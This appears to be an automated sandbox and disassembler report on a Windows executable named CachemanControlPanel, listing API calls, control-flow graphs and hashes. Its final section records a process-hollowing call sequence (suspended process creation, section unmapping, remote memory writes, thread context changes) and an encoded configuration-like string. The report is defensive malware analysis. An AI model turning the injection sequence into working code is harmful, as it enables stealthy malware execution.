                                                        control_flow_graph 803 4188d0-4188e9 TlsGetValue 804 4188f4-41890f 803->804 805 4188eb-4188f1 803->805 806 418911-418942 RtlReAllocateHeap 804->806 807 418944-41894e 804->807 805->804 808 41898c-4189ac 806->808 807->808 809 418950-418957 807->809 810 418960-41898a HeapReAlloc 809->810 811 418959 809->811 810->808 811->810
                                                        APIs
                                                        • TlsGetValue.KERNEL32(00000022,00001000,00000000,00000000), ref: 004188DC
                                                        • RtlReAllocateHeap.NTDLL(02A80000,00000000,?,?), ref: 00418937
                                                        • HeapReAlloc.KERNEL32(02A80000,00000000,?,000FFFF6), ref: 00418981
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocAllocateValue
                                                        • String ID:
                                                        • API String ID: 1566162415-0
                                                        • Opcode ID: aef585887fbf2e801a0943c96021bb97876ca3429b4e8cd843820f53fd5631cc
                                                        • Instruction ID: 0fbfacc5a734ef1e09f863a6cef04630cf83f8fc68f1c65456e43bca00c9a9f7
                                                        • Opcode Fuzzy Hash: aef585887fbf2e801a0943c96021bb97876ca3429b4e8cd843820f53fd5631cc
                                                        • Instruction Fuzzy Hash: 9D31B574A00209EFCB04CF98D694A9DB7B5FB88318F20C1A9E845AB355C731AE81DF84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 812 4185b0-4185d7 TlsGetValue 813 4185f6-418615 HeapReAlloc 812->813 814 4185d9-4185f4 RtlAllocateHeap 812->814 815 418617-41863d call 418a90 813->815 814->815
                                                        APIs
                                                        • TlsGetValue.KERNEL32(00000022,00000000,00000000), ref: 004185BC
                                                        • RtlAllocateHeap.NTDLL(02A80000,00000000,?), ref: 004185E9
                                                        • HeapReAlloc.KERNEL32(02A80000,00000000,?,?), ref: 0041860C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocAllocateValue
                                                        • String ID:
                                                        • API String ID: 1566162415-0
                                                        • Opcode ID: 96dea2c415d371175326177c8b01b83b3aea3fc76d16007666b839674a00bf32
                                                        • Instruction ID: 0b3564f57bff6a3c22bf37c8f2f50f100e93119f5e469cc445a38e39922f3316
                                                        • Opcode Fuzzy Hash: 96dea2c415d371175326177c8b01b83b3aea3fc76d16007666b839674a00bf32
                                                        • Instruction Fuzzy Hash: D311FB74A00208EFC708DF98D994E9ABBB6FF88310F10C199E8099B354D775AE81CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 818 418520-418548 HeapCreate TlsAlloc call 419000
                                                        APIs
                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,?,0040104E,00000000,00001000,00000000,00000000), ref: 0041852C
                                                        • TlsAlloc.KERNEL32(?,0040104E,00000000,00001000,00000000,00000000), ref: 00418537
                                                          • Part of subcall function 00419000: HeapAlloc.KERNEL32(02A80000,00000000,0000000C,?,?,00418547,?,0040104E,00000000,00001000,00000000,00000000), ref: 0041900E
                                                          • Part of subcall function 00419000: HeapAlloc.KERNEL32(02A80000,00000000,00000010,?,?,00418547,?,0040104E,00000000,00001000,00000000,00000000), ref: 00419022
                                                          • Part of subcall function 00419000: TlsSetValue.KERNEL32(00000022,00000000,?,?,00418547,?,0040104E,00000000,00001000,00000000,00000000), ref: 0041904B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap$CreateValue
                                                        • String ID:
                                                        • API String ID: 493873155-0
                                                        • Opcode ID: 78c2c0c0c07cac62f1ec53d2f66c29e3876caa767cca0b542a5b70da64064170
                                                        • Instruction ID: 0d125e3cdd7032c22b7ffeac5eb257d78f434ecb57c9d1a851f662740cab3c45
                                                        • Opcode Fuzzy Hash: 78c2c0c0c07cac62f1ec53d2f66c29e3876caa767cca0b542a5b70da64064170
                                                        • Instruction Fuzzy Hash: 3FD0803454530567D7147FB1BE0EB457FB4A704B85F102077F644562D0D6F46040C51C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 821 417730-41774e 822 417750-417757 821->822 823 4177a8-4177b0 821->823 826 417759-41775e 822->826 827 41776f-41777d call 4188d0 822->827 824 4177b2-4177be 823->824 825 4177d5-4177d7 823->825 830 4177e0-4177e2 824->830 831 4177c0-4177c3 824->831 828 4177db-4177de 825->828 832 417760-417769 826->832 838 417797-4177a5 call 4189b0 827->838 839 41777f-417781 827->839 828->830 833 4177f1-4177f6 828->833 835 4177e5-4177eb 830->835 831->828 836 4177c5-4177d3 call 418b10 831->836 832->832 837 41776b-41776d 832->837 841 417803-41781b MultiByteToWideChar call 4188d0 833->841 842 4177f8-4177fa 833->842 835->835 840 4177ed-4177ef 835->840 836->828 837->827 839->838 844 417783 839->844 840->841 851 417820-41783e MultiByteToWideChar 841->851 842->841 845 4177fc-417801 842->845 849 417785-41778c 844->849 845->841 845->842 849->838 852 41778e-417795 849->852 852->838 852->849
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0043101C,?,?,?,00401116,0043101C,FFFFFFFF,00000002,00000000,00000000), ref: 00417812
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000001,?,?,?,00401116,0043101C,FFFFFFFF,00000002,00000000), ref: 00417832
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide
                                                        • String ID:
                                                        • API String ID: 626452242-0
                                                        • Opcode ID: d24b1900dd2734c72ebb843afdd96ba6c6d82ae8885cf87f0c476a4ee9f05af6
                                                        • Instruction ID: c00abbf960adee3d0edad9a4a2567d52d6a0582dac33a8d482c5aaa4d1fe8794
                                                        • Opcode Fuzzy Hash: d24b1900dd2734c72ebb843afdd96ba6c6d82ae8885cf87f0c476a4ee9f05af6
                                                        • Instruction Fuzzy Hash: 5E31263610C3055AD7345E748C80BFBB7A9EF80364F24471FFAB1062C1DA79A881C769
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00418710: TlsGetValue.KERNEL32(00000022,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404AE3,00000000), ref: 00418727
                                                          • Part of subcall function 00418570: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 00418576
                                                          • Part of subcall function 00418570: TlsGetValue.KERNEL32(00000022), ref: 00418585
                                                          • Part of subcall function 00418570: SetLastError.KERNEL32(?), ref: 0041859B
                                                          • Part of subcall function 004185B0: TlsGetValue.KERNEL32(00000022,00000000,00000000), ref: 004185BC
                                                          • Part of subcall function 004185B0: RtlAllocateHeap.NTDLL(02A80000,00000000,?), ref: 004185E9
                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000400,00000000,00000400,00000000,00000000,00001000,00000000,004012EF,00000001,00000000,00433874,\ref.conf,02A804F8,00000000), ref: 00408BF6
                                                          • Part of subcall function 0040C98E: memmove.MSVCRT ref: 0040C9F8
                                                          • Part of subcall function 0040A200: TlsGetValue.KERNEL32(?,?,0040819F,00000000,00000002,00000000,00000000,00000000,00000000,00404B56,00000000,00000000,00000001,00000001,00000006,00000000), ref: 0040A208
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$AllocateFileHeapModuleNamememmove
                                                        • String ID:
                                                        • API String ID: 4186491432-0
                                                        • Opcode ID: 519a5f2df4cb9efcb1940f9290fab02e45dc6c3f7633f14c4f3d0396c2a33224
                                                        • Instruction ID: dfad88e31201a60bca71200c0e2e917d238116b7a53534fa5764cd053a75b2ee
                                                        • Opcode Fuzzy Hash: 519a5f2df4cb9efcb1940f9290fab02e45dc6c3f7633f14c4f3d0396c2a33224
                                                        • Instruction Fuzzy Hash: 34011ABA60820079F50032729E42E7F76ADDBC0718F20CC3FB544A50A2DD3D8DD2612E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 885 4178a0-4178a6 886 4178a8-4178b7 RtlAllocateHeap 885->886 887 4178ba-4178bc 885->887
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000008,?,00416A00,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00407D6F,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004178B1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 014e06c44eedf72f864cf5f4bccbe57ff615cde333a800e5a5b8fef4433f5551
                                                        • Instruction ID: 7e86721d88d3ce07b1106d8c4c3afbef5ad9907f2bd5d0025e144fa018d6bba2
                                                        • Opcode Fuzzy Hash: 014e06c44eedf72f864cf5f4bccbe57ff615cde333a800e5a5b8fef4433f5551
                                                        • Instruction Fuzzy Hash: 03C08C703041006AE210AB208E08E13B2A8BBB0702F00C1357940D2030DA30D850D72C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 888 417c3f-417c46 889 417c4d-417c54 888->889 890 417c4c 888->890 891 417c62 889->891 892 417c56-417c5c TlsFree 889->892 892->891
                                                        APIs
                                                        • TlsFree.KERNEL32(00401C68,00401C26,00000000,00430024,00000002,installation,melt,00000000,00000000,00000BB8,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00417C5C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Free
                                                        • String ID:
                                                        • API String ID: 3978063606-0
                                                        • Opcode ID: aa6af9673f1bbe2c58e7615ed852a0d64bc20d56dec7e313c9be00a3e4f0119b
                                                        • Instruction ID: eb288b85b48c32f9e4eae089c254f08455f866ae05fe5284637a17ab30625fc2
                                                        • Opcode Fuzzy Hash: aa6af9673f1bbe2c58e7615ed852a0d64bc20d56dec7e313c9be00a3e4f0119b
                                                        • Instruction Fuzzy Hash: 2EC04C74109500DADF1D9B04EE5C3DA3671A794306F8531759141406B097B818C8DA4C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 893 4176c0-4176d4 HeapCreate
                                                        APIs
                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00401058,00000000,00001000,00000000,00000000), ref: 004176C9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CreateHeap
                                                        • String ID:
                                                        • API String ID: 10892065-0
                                                        • Opcode ID: 09b5d79ccfeef75f47126ec15d3ca90387355639b8aaa74fa636c0960585f891
                                                        • Instruction ID: 0b8493055920dceaf826dff0ee9a24664562e59d1baa424ebd4b4d3ac4319635
                                                        • Opcode Fuzzy Hash: 09b5d79ccfeef75f47126ec15d3ca90387355639b8aaa74fa636c0960585f891
                                                        • Instruction Fuzzy Hash: E5B0127828130056E2106B105C06B4536506344B83F202160F780691E8C6E02080850C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • HeapDestroy.KERNELBASE(00401C6D,00401C26,00000000,00430024,00000002,installation,melt,00000000,00000000,00000BB8,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004176B6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: DestroyHeap
                                                        • String ID:
                                                        • API String ID: 2435110975-0
                                                        • Opcode ID: be6c3e3a4ed24d0e642c62fa803ea010b154476a0cb1b07011b756beb45e0ad3
                                                        • Instruction ID: 5a8a3dc7f93015dc990b4be8d15d1344688ac09c3aab1d116acd2d17537b8726
                                                        • Opcode Fuzzy Hash: be6c3e3a4ed24d0e642c62fa803ea010b154476a0cb1b07011b756beb45e0ad3
                                                        • Instruction Fuzzy Hash: 779002385000008BCE056B10EE0844A3B61A78034130173B0A5415113486621591DA4C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FreeLibrary.KERNEL32(00401C59,00401C26,00000000,00430024,00000002,installation,melt,00000000,00000000,00000BB8,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412F26
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: c6395dcad5b770e0143b5b68f27e48159df21151849e5ada74fd8836b156cbd6
                                                        • Instruction ID: 103c28104c35aaeb3d559824fec656e073f83bab52f9213d56a4647c953672eb
                                                        • Opcode Fuzzy Hash: c6395dcad5b770e0143b5b68f27e48159df21151849e5ada74fd8836b156cbd6
                                                        • Instruction Fuzzy Hash: C59002305000C08FCE096B10EF095443A75A7803123006170D2018017096611454DB08
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: malloc
                                                        • String ID:
                                                        • API String ID: 2803490479-0
                                                        • Opcode ID: aa66453bd3091b542903cc8698100348030e536ae2a08d13a9d84c896f0ed048
                                                        • Instruction ID: 3d064ecb93fb3f2bf6d57a64116dd6a8d57b64d273da11784b4fd6676e6407f2
                                                        • Opcode Fuzzy Hash: aa66453bd3091b542903cc8698100348030e536ae2a08d13a9d84c896f0ed048
                                                        • Instruction Fuzzy Hash: 05B012B5404201AFC604CB54FE8980BFBE8FFD0240F809824F049C6030C334E114CB1B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        APIs
                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,000000F8,?,?,00000040), ref: 00407F8A
                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 00407FA0
                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?), ref: 00407FC3
                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,?,00003000,00000040,00000000,00000000,00000000,00000000,00000000,00000004), ref: 00407FE9
                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000028), ref: 00408078
                                                        • GetThreadContext.KERNEL32(?,?), ref: 004080AA
                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?), ref: 004080DC
                                                        • SetThreadContext.KERNEL32(?,?,?,?,?,00000004,00000000,?,?), ref: 0040810C
                                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,00000004,00000000,?,?), ref: 0040811B
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00407EA1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
